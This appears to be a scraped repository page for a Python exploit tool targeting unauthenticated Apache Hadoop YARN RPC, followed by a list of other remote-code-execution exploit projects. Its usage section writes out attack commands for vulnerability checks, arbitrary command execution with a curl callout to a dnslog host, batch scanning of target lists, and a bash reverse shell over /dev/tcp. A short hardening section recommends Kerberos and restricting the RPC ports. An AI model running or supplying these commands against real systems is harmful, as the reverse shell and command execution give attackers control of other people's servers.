Hadoop Yan RPC unauthorized RCE

Related tags

Security related resources hadoop-yan-rpc-unauthorized-rce
Overview

Vuln Impact

On November 15, 2021, A security researcher disclosed that there was an unauthorized access vulnerability in Hadoop yarn RPC. This vulnerability existed in Hadoop yarn, the core component of Hadoop. Because Hadoop yarn opened the RPC service to the public by default, a remote attacker could take advantage of this unauthorized vulnerability and execute arbitrary commands through the RPC service, so as to control the target server, In view of the high-risk status and great harm of this vulnerability, and the details have been disclosed and exploited by the opposition, it is recommended that all users using Apache Hadoop conduct self-examination and take security measures in time.

Vuln Product

Apache Hadoop Yarn *

Vunl Check

Basic usage

python3 Hadoop_Yan_RPC_RCE.py

img

Vuln check

python3 Hadoop_Yan_RPC_RCE.py -v true -t http://www.target.com

img

command execute

python3 Hadoop_Yan_RPC_RCE.py -a true -t http://www.target.com  -c "curl xxx.dnslog.cn"

attack

dnslog

batch scan

python3 Hadoop_Yan_RPC_RCE.py -s true -f target.txt

scan_result

Reserve Shell

& /dev/tcp/ip/port 0>&1" "> 
python3 Hadoop_Yan_RPC_RCE.py -a true -t http://www.target.com -c "bash -i >& /dev/tcp/ip/port 0>&1"

reverse_shell1

Reference

https://nosec.org/home/detail/4905.html

https://github.com/N0b1ta/Bit-Cannon/tree/master/Apache/Hadoop/YARN/hadoop-yarn-rest-api-unauth

Safety Advice

1.Enable Kerberos authentication to prevent unauthorized access.

<property>
    <name>hadoop.security.authenticationname>
    <value>kerberosvalue>
    <final>falsefinal>
    <source>core-site.xmlsource>
property>...
<property>
    <name>hadoop.rpc.protectionname>
    <value>authenticationvalue>
    <final>falsefinal>
    <source>core-default.xmlsource>
property>

2.Prohibit external addresses from accessing Hadoop RPC service related ports or configured to be open only to trusted addresses.

Solemnly declare: Don't use this tool for illegal operation. This tool is only used for safety self checking by Party A's personnel and Party B's personnel.If the user uses it illegally, the legal responsibility shall be borne by the user!!!.

You might also like...
RCE Exploit for Gitlab 13.9.4

GitLab-Wiki-RCE RCE Exploit for Gitlab 13.9.4 RCE via unsafe inline Kramdown options when rendering certain Wiki pages Allows any user with push acc

Enox 52 Nov 9, 2022
ProxyShell POC Exploit : Exchange Server RCE (ACL Bypass + EoP + Arbitrary File Write)

ProxyShell Install git clone https://github.com/ktecv2000/ProxyShell cd ProxyShell virtualenv -p $(which python3) venv source venv/bin/activate pip3 i

Poming huang 312 Dec 9, 2022
RCE 0-day for GhostScript 9.50 - Payload generator
RCE 0-day for GhostScript 9.50 - Payload generator

RCE-0-day-for-GhostScript-9.50 PoC for RCE 0-day for GhostScript 9.50 - Payload generator The PoC in python generates payload when exploited for a 0-d

null 534 Dec 14, 2022
CVE-2021-26084 - Confluence Pre-Auth RCE OGNL injection
CVE-2021-26084 - Confluence Pre-Auth RCE OGNL injection

CVE-2021-26084 - Confluence Pre-Auth RCE OGNL injection Usage usage: cve-2021-26084_confluence_rce.py [-h] --url URL [--cmd CMD] [--shell] CVE-2021-2

r0cky 92 Jul 20, 2022
A Python 3 script that uploads a tasks.pickle file that enables RCE in MotionEye

MotionEye/MotionEyeOS Authenticated RCE A Python 3 script that uploads a tasks.pickle file that enables RCE in MotionEye. You need administrator crede

Matt 1 Apr 18, 2022
CVE-2021-22205& GitLab CE/EE RCE
CVE-2021-22205& GitLab CE/EE RCE

Vuln Impact An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files tha

Al1ex 213 Dec 30, 2022
GitLab CE/EE Preauth RCE using ExifTool
GitLab CE/EE Preauth RCE using ExifTool

CVE-2021-22205 GitLab CE/EE Preauth RCE using ExifTool This project is for learning only, if someone's rights have been violated, please contact me to

3ND 164 Dec 10, 2022
Exploit for CVE-2017-17562 vulnerability, that allows RCE on GoAhead ( v3.6.5) if the CGI is enabled and a CGI program is dynamically linked.

GoAhead RCE Exploit Exploit for CVE-2017-17562 vulnerability, that allows RCE on GoAhead ( v3.6.5) if the CGI is enabled and a CGI program is dynamic

Francisco Spínola 2 Dec 12, 2021
DepFine Is a tool to find the unregistered dependency based on dependency confusion valunerablility and lead to RCE
DepFine Is a tool to find the unregistered dependency based on dependency confusion valunerablility and lead to RCE

DepFine DepFine Is a tool to find the unregistered dependency based on dependency confusion valunerablility and lead to RCE Installation: You Can inst

Hossam mesbah 14 Nov 11, 2022
Owner
Al1ex
Al1ex
GitHub
CVE-2021-22205 Unauthorized RCE

CVE-2021-22205 影响版本: Gitlab CE/EE < 13.10.3 Gitlab CE/EE < 13.9.6 Gitlab CE/EE < 13.8.8 Usage python3 CVE-2021-22205.py target "curl \`whoami\`.dnslog

r0eXpeR 70 Nov 9, 2022
VMware vCenter earlier v(7.0.2.00100) unauthorized arbitrary file read

vcenter_fileread_exploit VMware vCenter earlier v(7.0.2.00100) unauthorized arbitrary file read Usage python3 vCenter_fileread.py http(s)://ip Referen

Ashish Kunwar 4 Sep 23, 2022
This is a proof-of-concept exploit for Grafana's Unauthorized Arbitrary File Read Vulnerability (CVE-2021-43798).

CVE-2021-43798 – Grafana Exploit About This is a proof-of-concept exploit for Grafana's Unauthorized Arbitrary File Read Vulnerability (CVE-2021-43798

Pedro Havay 12 Nov 18, 2022
WebLogic T3/IIOP RCE ExternalizableHelper.class of coherence.jar

CVE-2020-14756 WebLogic T3/IIOP RCE ExternalizableHelper.class of coherence.jar README project base on https://github.com/Y4er/CVE-2020-2555 and weblo

Y4er 77 Dec 6, 2022
Gitlab RCE - Remote Code Execution

Gitlab RCE - Remote Code Execution RCE for old gitlab version <= 11.4.7 & 12.4.0-12.8.1 LFI for old gitlab versions 10.4 - 12.8.1 This is an exploit f

null 153 Nov 9, 2022
com_media allowed paths that are not intended for image uploads to RCE

CVE-2021-23132 com_media allowed paths that are not intended for image uploads to RCE. CVE-2020-24597 Directory traversal in com_media to RCE Two CVEs

KIEN HOANG 67 Nov 9, 2022
exchange-ssrf-rce

Usage python3 .\exchange-exp.py -------------------------------------------------------------------------------- |

Jen 76 Nov 9, 2022
ProxyLogon(CVE-2021-26855+CVE-2021-27065) Exchange Server RCE(SSRF->GetWebShell)

ProxyLogon For Python3 ProxyLogon(CVE-2021-26855+CVE-2021-27065) Exchange Server RCE(SSRF->GetWebShell) usage: python ProxyLogon.py --host=exchang

null 112 Dec 1, 2022
CVE-2021-22986 & F5 BIG-IP RCE

Vuln Impact This vulnerability allows for unauthenticated attackers with network access to the iControl REST interface, through the BIG-IP management

Al1ex 85 Dec 2, 2022
Unsafe Twig processing of static pages leading to RCE in Grav CMS 1.7.10

CVE-2021-29440 Unsafe Twig processing of static pages leading to RCE in Grav CMS 1.7.10 Grav is a file based Web-platform. Twig processing of static p

Enox 6 Oct 10, 2022